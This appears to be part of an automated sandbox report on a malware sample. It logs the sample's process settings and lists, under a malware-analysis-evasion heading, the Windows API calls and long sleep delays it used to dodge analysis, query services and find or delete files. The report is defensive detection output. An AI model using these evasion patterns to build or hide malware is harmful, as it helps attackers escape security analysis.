                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040F7A7 Sleep,ExitProcess,0_2_0040F7A7
                      Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A748
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeWindow / User API: threadDelayed 6829Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeWindow / User API: threadDelayed 2501Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeWindow / User API: foregroundWindowGot 1766Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5199Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4606Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6228
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3639
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 4864Thread sleep count: 235 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 4864Thread sleep time: -117500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300Thread sleep count: 6829 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300Thread sleep time: -20487000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300Thread sleep count: 2501 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300Thread sleep time: -7503000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 3708Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1032Thread sleep count: 6228 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1032Thread sleep count: 3639 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_100010F1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_10006580 FindFirstFileExA,0_2_10006580
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
